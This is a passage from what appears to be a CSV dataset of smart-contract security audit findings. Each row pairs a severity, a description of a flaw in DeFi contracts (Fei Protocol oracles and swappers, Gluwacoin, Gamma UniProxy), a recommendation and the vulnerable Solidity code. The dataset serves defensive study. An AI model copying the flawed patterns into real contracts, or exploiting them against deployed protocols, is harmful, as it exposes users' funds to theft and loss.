token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\n" +UniProxy.depositSwap doesn't deposit all the users' funds,medium,"Resolution\\nFixed in 
GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nWhen executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n",Deposit all the user's funds to the Hypervisor.,,"```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n" +Initialization flaws,low,"For non-upgradeable contracts, the Solidity compiler takes care of chaining the constructor calls of an inheritance hierarchy in the right order; for upgradeable contracts, taking care of initialization is a manual task - and with extensive use of inheritance, it is tedious and error-prone. 
The convention in OpenZeppelin Contracts Upgradeable is to have a `__C_init_unchained` function that contains the actual initialization logic for contract `C` and a `__C_init` function that calls the `*_init_unchained` function for every super-contract - direct and indirect - in the inheritance hierarchy (including C) in the C3-linearized order from most basic to most derived. This pattern imitates what the compiler does for constructors.\\nAll `*_init` functions in the contracts (__ERC20WrapperGluwacoin_init, `__ERC20Reservable_init`, `__ERC20ETHless_init`, and __ERC20Wrapper_init) are missing some `_init_unchained` calls, and sometimes the existing calls are not in the correct order.\\nThe `__ERC20WrapperGluwacoin_init` function is implemented as follows:\\n```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n\\nAnd the C3 linearization is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThe calls `__ERC165_init_unchained();` and `__AccessControl_init_unchained();` are missing, and `__ERC20Wrapper_init_unchained(token);` should move between `__ERC20_init_unchained(name, symbol);` and `__ERC20ETHless_init_unchained();`.","Review all `*_init` functions, add the missing 
`*_init_unchained` calls, and fix the order of these calls.",,"```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n" +Flaw in _beforeTokenTransfer call chain and missing tests,low,"In OpenZeppelin's ERC-20 implementation, the virtual `_beforeTokenTransfer` function provides a hook that is called before tokens are transferred, minted, or burned. In the Gluwacoin codebase, it is used to check whether the unreserved balance (as opposed to the regular balance, which is checked by the ERC-20 implementation) of the sender is sufficient to allow this transfer or burning.\\nIn `ERC20WrapperGluwacoin`, `ERC20Reservable`, and `ERC20Wrapper`, the `_beforeTokenTransfer` function is implemented in the following way:\\n```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n if (from != address(0)) {\\n require(\\_unreservedBalance(from) >= amount, ""ERC20Reservable: transfer amount exceeds unreserved balance"");\\n }\\n\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\nFinally, the 
C3-linearization of the contracts is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThis means `ERC20Wrapper._beforeTokenTransfer` is ultimately called twice - once directly in `ERC20WrapperGluwacoin._beforeTokenTransfer` and then a second time because the `super._beforeTokenTransfer` call in `ERC20Reservable._beforeTokenTransfer` resolves to `ERC20Wrapper._beforeTokenTransfer`. (ERC20ETHless doesn't override _beforeTokenTransfer.)\\nMoreover, while reviewing the correctness and coverage of the tests is not in scope for this engagement, we happened to notice that there are no tests that check whether the unreserved balance is sufficient for transferring or burning tokens.","`ERC20WrapperGluwacoin._beforeTokenTransfer` should just call `super._beforeTokenTransfer`. Moreover, the `_beforeTokenTransfer` implementation can be removed from `ERC20Wrapper`.\\nWe would like to stress the importance of careful and comprehensive testing in general and of this functionality in particular, as it is crucial for the system's integrity. We also encourage investigating whether there are more such omissions and an evaluation of the test quality and coverage in general.",,"```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n" +Hard-coded decimals,low,"The Gluwacoin wrapper token should have the same number of decimals as the wrapped ERC-20. Currently, the number of decimals is hard-coded to 6. 
This limits flexibility or requires source code changes and recompilation if a token with a different number of decimals is to be wrapped.\\n```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\n","We recommend supplying the number of `decimals` as an initialization parameter and storing it in a state variable. That increases gas consumption of the `decimals` function, but we doubt this view function will be frequently called from a contract, and even if it was, we think the benefits far outweigh the costs.\\nMoreover, we believe the `decimals` logic (i.e., function `decimals` and the new state variable) should be implemented in the `ERC20Wrapper` contract - which holds the basic ERC-20 functionality of the wrapper token - and not in `ERC20WrapperGluwacoin`, which is the base contract of the entire system.",,```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\n +Re-initialization of the Balancer pool is potentially possible,low,"Instead of creating a new Balancer pool for an auction every time, the same pool is getting re-used repeatedly. When this happens, the old liquidity is withdrawn, and if there is enough FEI in the contract, the weights are shifted and the pool is filled with new tokens. If there is not enough FEI, the pool is left empty, and users can still interact with it. When there's enough FEI again, it's re-initialized again, which is not the intention:\\n```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n\\nTheoretically, this will never happen because there should be minimal leftover liquidity tokens after the withdrawal. 
But we couldn't strictly verify that fact because it requires looking into balancer code much deeper.","One of the options would be only to allow re-using the pool in atomic transactions. So if there are not enough FEI tokens for the next auction, the `swap` transaction reverts. That will help with another issue (issue 3.2) too.",,"```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n" +The BalancerLBPSwapper may not have enough Tribe tokens,low,"Whenever the `swap` function is called, it should re-initialize the Balancer pool that requires adding liquidity: 99% Fei and 1% Tribe. So the Tribe should initially be in the contract.\\n```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n\\nAdditionally, when the `swap` is called, and there is not enough FEI to re-initiate the Balancer auction, all the Tribe gets withdrawn. So the next time the `swap` is called, there is no Tribe in the contract again.\\n```\\n// 5. 
Send remaining tokenReceived to target\\nIERC20(tokenReceived).transfer(tokenReceivingAddress, IERC20(tokenReceived).balanceOf(address(this)));\\n```\\n",Create an automated mechanism that mints/transfers Tribe when it is needed in the swapper contract.,,```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n +StableSwapOperatorV1 - resistantFei value is not correct in the resistantBalanceAndFei function,high,"The `resistantBalanceAndFei` function of a `PCVDeposit` contract is supposed to return the amount of funds that the contract controls; it is then used to evaluate the total value of PCV (collateral in the protocol). Additionally, this function returns the number of FEI tokens that are protocol-controlled. These FEI tokens are “temporarily minted”; they are not backed up by the collateral and shouldn't be used in calculations that determine the collateralization of the protocol.\\nIdeally, the amount of these FEI tokens should be the same during the deposit, withdrawal, and the `resistantBalanceAndFei` function call. In the `StableSwapOperatorV1` contract, all these values are totally different:\\nduring the deposit, the amount of required FEI tokens is calculated. It's done in a way so the values of FEI and 3pool tokens in the metapool should be equal after the deposit. 
So if there is the initial imbalance of FEI and 3pool tokens, the deposit value of these tokens will be different:\\n```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n\\nduring the withdrawal, the FEI and 3pool tokens are withdrawn in the same proportion as they are present in the metapool:\\n```\\nuint256[2] memory \\_minAmounts; // [0, 0]\\nIERC20(pool).approve(pool, \\_lpToWithdraw);\\nuint256 \\_3crvBalanceBefore = IERC20(\\_3crv).balanceOf(address(this));\\nIStableSwap2(pool).remove\\_liquidity(\\_lpToWithdraw, \\_minAmounts);\\n```\\n\\nin the `resistantBalanceAndFei` function, the value of protocol-controlled FEI tokens and the value of 3pool tokens deposited are considered equal:\\n```\\nresistantBalance = \\_lpPriceUSD / 2;\\nresistantFei = resistantBalance;\\n```\\n\\nSome of these values may be equal under some circumstances, but that is not enforced. 
After one of the steps (deposit or withdrawal), the total PCV value and collateralization may be changed significantly.","Make sure that deposit, withdrawal, and the `resistantBalanceAndFei` are consistent and won't instantly change the PCV value significantly.",,"```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n" +CollateralizationOracle - Fei in excluded deposits contributes to userCirculatingFei,high,"`CollateralizationOracle.pcvStats` iterates over all deposits, queries the resistant balance and FEI for each deposit, and accumulates the total value of the resistant balances and the total resistant FEI. Any Guardian or Governor can exclude (and re-include) a deposit that has become problematic in some way, for example, because it is reporting wrong numbers. Finally, the `pcvStats` function computes the `userCirculatingFei` as the total FEI supply minus the accumulated resistant FEI balances; the idea here is to determine the amount of “free” FEI, or FEI that is not PCV. However, the FEI balances from excluded deposits contribute to the `userCirculatingFei`, although they are clearly not “free” FEI. 
That leads to a wrong `protocolEquity` and a skewed collateralization ratio and might therefore have a significant impact on the economics of the system.\\nIt should be noted that even the exclusion from the total PCV leads to a `protocolEquity` and a collateralization ratio that could be considered skewed (again, it might depend on the exact reasons for exclusion), but “adding” the missing FEI to the `userCirculatingFei` distorts these numbers even more.\\nIn the extreme scenario that all deposits have been excluded, the entire Fei supply is currently reported as `userCirculatingFei`.\\n```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 
\\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\n","It is unclear how to fix this. One might want to exclude the FEI in excluded deposits entirely from the calculation, but not knowing the amount was the reason to exclude the deposit in the first place.\\nOne option could be to let the entity that excludes a deposit specify substitute values that should be used instead of querying the numbers from the deposit. However, it is questionable whether this approach is practical if the numbers we'd like to see as substitute values change quickly or repeatedly over time. Ultimately, the querying function itself should be fixed. Moreover, as the substitute values can dramatically impact the system economics, we'd only like to trust the Governor with this and not give this permission to a Guardian. 
However, the original intention was to give a role with less trust than the Governor the possibility to react quickly to a deposit that reports wrong numbers; if the exclusion of deposits becomes the Governor's privilege, such a quick and lightweight intervention isn't possible anymore.\\nIndependently, we recommend taking proper care of the situation that all deposits - or just too many - have been excluded, for example, by setting the returned `validityStatus` to `false`, as in this case, there is not enough information to compute the collateralization ratio even as a crude approximation.",,"```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 
\\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\n" +BalancerLBPSwapper - init() can be front-run to potentially steal tokens,medium,"The deployment process for `BalancerLBPSwapper` appears to be the following:\\ndeploy `BalancerLBPSwapper`.\\nrun `ILiquidityBootstrappingPoolFactory.create()` proving the newly deployed swapper address as the owner of the pool.\\ninitialize `BalancerLBPSwapper.init()` with the address of the newly created pool.\\nThis process may be split across multiple transactions as in the `v2Phase1.js` deployment scenario.\\nBetween step (1) and (3) there is a window of opportunity for someone to maliciously initialize contract. This should be easily detectable because calling `init()` twice should revert the second transaction. If this is not caught in the deployment script this may have more severe security implications. 
Otherwise, this window can be used to grief the deployment by initializing it before the original initializer does, forcing them to redeploy the contract or to steal any tokenSpent/tokenReceived that are owned by the contract at this time.\\nNote: It is assumed that the contract will not own a lot of tokens right after deployment rendering the scenario of stealing tokens more unlikely. However, that highly depends on the deployment script for the contract system.\\n```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), ""BalancerLBPSwapper: initialized"");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), ""BalancerLBPSwapper: contract not pool owner"");\\n```\\n\\n```\\nIERC20(tokenSpent).approve(address(\\_vault), type(uint256).max);\\nIERC20(tokenReceived).approve(address(\\_vault), type(uint256).max);\\n```\\n",protect `BalancerLBPSwapper.init()` and only allow a trusted entity (e.g. the initial deployer) to call this method.,,"```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), ""BalancerLBPSwapper: initialized"");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), ""BalancerLBPSwapper: contract not pool owner"");\\n```\\n" +PCVEquityMinter and BalancerLBPSwapper - desynchronisation race,medium,"There is nothing that prevents other actors from calling `BalancerLBPSwapper.swap()` `afterTime` but right before `PCVEquityMinter.mint()` would as long as the `minAmount` required for the call to pass is deposited to `BalancerLBPSwapper`.\\nBoth the `PCVEquityMinter.mint()` and `BalancerLBPSwapper.swap()` are timed (via the `afterTime` modifier) and are ideally in sync. 
In an ideal world the incentive to call `mint()` would be enough to ensure that both contracts are always in sync, however, a malicious actor might interfere by calling `.swap()` directly, providing the `minAmount` required for the call to pass. This will have two effects:\\ninstead of taking the newly minted FEI from `PCVEquityMinter`, existing FEI from the malicious user will be used with the pool. (instead of inflating the token the malicious actor basically pays for it)\\nthe `Timed` modifiers of both contracts will be out of sync with `BalancerLBPSwapper.swap()` being reset (and failing until it becomes available again) and `PCVEquityMinter.mint()` still being available. Furthermore, keeper-scripts (or actors that want to get the incentive) might continue to attempt to `mint()` while the call will ultimately fail in `.swap()` due to the resynchronization of `timed` (unless they simulate the calls first).\\nNote: There are not a lot of incentives to actually exploit this other than preventing protocol inflation (mint) and potentially griefing users. A malicious user will lose out on the incentivized call and has to ensure that the `minAmount` required for `.swap()` to work is available. 
It is, however, in the best interest of security to defuse the unpredictable racy character of the contract interaction.\\n```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n\\n```\\nfunction swap() external override afterTime whenNotPaused {\\n (\\n uint256 spentReserves,\\n uint256 receivedReserves, \\n uint256 lastChangeBlock\\n ) = getReserves();\\n\\n // Ensures no actor can change the pool contents earlier in the block\\n require(lastChangeBlock < block.number, ""BalancerLBPSwapper: pool changed this block"");\\n```\\n",If `BalancerLBPSwapper.swap()` is only to be called within the flows of action from a `PCVEquityMinter.mint()` it is suggested to authenticate the call and only let `PCVEquityMinter` call `.swap()`,,```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n +CollateralizationOracleWrapper - the deviation threshold check in update() always returns false,medium,"A call to `update()` returns a boolean flag indicating whether the update was performed on outdated data. This flag is being checked in `updateIfOutdated()` which is typically called by an incentivized keeper function.\\nThe `_isExceededDeviationThreshold` calls at the end of the `_update()` function always return `false` as they are comparing the same values (cachedProtocolControlledValue to the `_protocolControlledValue` value and `cachedProtocolControlledValue` has just been set to `_protocolControlledValue` a couple of lines before). `_isExceededDeviationThreshold` will, therefore, never detect a deviation and return `false`.\\nThere may currently be no incentive (e.g. from the keeper side) to call `update()` if the values are not outdated but they deviated too much from the target. 
However, anyone can force an update by calling the non-incentivized public `update()` method instead.\\n```\\n require(\\_validityStatus, ""CollateralizationOracleWrapper: CollateralizationOracle is invalid"");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\n","Add unit tests to check for all three return conditions (timed, deviationA, deviationB)\\nMake sure to compare the current to the stored value before updating the cached values when calling `_isExceededDeviationThreshold`.",,"```\\n require(\\_validityStatus, ""CollateralizationOracleWrapper: CollateralizationOracle is invalid"");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\n" +ChainlinkOracleWrapper - latestRoundData might return stale results,medium,"The oracle wrapper calls out to a chainlink oracle receiving the `latestRoundData()`. 
It then checks freshness by verifying that the answer is indeed for the last known round. The returned `updatedAt` timestamp is not checked.\\nIf there is a problem with chainlink starting a new round and finding consensus on the new value for the oracle (e.g. chainlink nodes abandon the oracle, chain congestion, vulnerability/attacks on the chainlink system) consumers of this contract may continue using outdated stale data (if oracles are unable to submit no new round is started)\\n```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n\\n```\\n/// @notice determine if read value is stale\\n/// @return true if read value is stale\\nfunction isOutdated() external view override returns (bool) {\\n (uint80 roundId,,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n return answeredInRound != roundId;\\n}\\n```\\n",Consider checking the oracle responses `updatedAt` value after calling out to `chainlinkOracle.latestRoundData()` verifying that the result is within an allowed margin of freshness.,,"```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n" +CollateralizationOracle - missing events and incomplete event 
information,low,"The `CollateralizationOracle.setDepositExclusion` function is used to exclude and re-include deposits from collateralization calculations. Unlike the other state-changing functions in this contract, it doesn't emit an event to inform about the exclusion or re-inclusion.\\n```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n\\nThe `DepositAdd` event emits not only the deposit address but also the deposit's token. Despite the symmetry, the `DepositRemove` event does not emit the token.\\n```\\nevent DepositAdd(address from, address indexed deposit, address indexed token);\\nevent DepositRemove(address from, address indexed deposit);\\n```\\n","`setDepositInclusion` should emit an event that informs about the deposit and whether it was included or excluded.\\nFor symmetry reasons and because it is indeed useful information, the `DepositRemove` event could include the deposit's token.",,"```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n" +RateLimited - Contract starts with a full buffer at deployment,low,A contract that inherits from `RateLimited` starts out with a full buffer when it is deployed.\\n```\\n\\_bufferStored = \\_bufferCap;\\n```\\n\\nThat means the full `bufferCap` is immediately available after deployment; it doesn't have to be built up over time. This behavior might be unexpected.,"We recommend starting with an empty buffer, or - if there are valid reasons for the current implementation - at least document it clearly.",,```\\n\\_bufferStored = \\_bufferCap;\\n```\\n +BalancerLBPSwapper - tokenSpent and tokenReceived should be immutable,low,Acc. 
